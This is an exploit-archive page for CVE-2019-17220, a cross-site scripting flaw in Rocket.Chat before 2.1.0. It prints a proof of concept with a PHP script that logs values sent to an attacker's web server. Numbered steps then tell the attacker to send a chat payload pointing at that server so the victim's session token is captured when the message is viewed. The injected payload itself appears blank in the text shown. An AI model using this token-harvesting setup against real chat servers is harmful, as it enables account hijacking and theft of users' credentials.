rocket.chat 2.1.0 crosssite scripting
▸▸▸ Exploit & Vulnerability >> webapps exploit & linux vulnerability
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting # Author: 3H34N # Date: 2019-10-22 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat < 2.1.0 # CVE: CVE-2019-17220 # Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp) # PoC # 1. Create l33t.php on a web server <?php $output = fopen("logs.txt", "a+") or die("WTF? o.O"); $leet = $_GET['leet']."\n\n"; fwrite($output, $leet); fclose($output); ?> # 2. Open a chat session # 3. Send payload with your web server url  # 4. Token will be written in logs.txt when target seen your message.
Rocket.chat 2.1.0 crosssite scripting Vulnerability / Exploit Source : Rocket.chat 2.1.0 crosssite scripting